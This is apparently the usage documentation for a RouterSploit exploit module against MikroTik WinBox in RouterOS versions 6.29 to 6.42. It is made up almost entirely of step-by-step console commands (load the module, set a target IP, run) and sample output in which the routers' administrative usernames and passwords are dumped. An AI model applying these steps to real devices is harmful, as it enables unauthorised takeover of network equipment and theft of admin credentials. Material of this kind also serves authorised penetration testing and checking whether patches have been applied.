Description
Module bypass authentication through WinBox service in Mikrotik devices version from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) and retrieves administrative credentials.
Verification Steps
- Start
./rsf.py
- Do:
use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
- Do:
set target [TargetIP]
- Do:
run
- If device is vulnerable administrative credentials are returned.
Scenarios
rsf > use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > run
[*] Running module...
[*] Connection established
[+] Target seems to be vulnerable
[*] Dumping credentials
Username Password
-------- --------
user1 test
admin admin
admin admin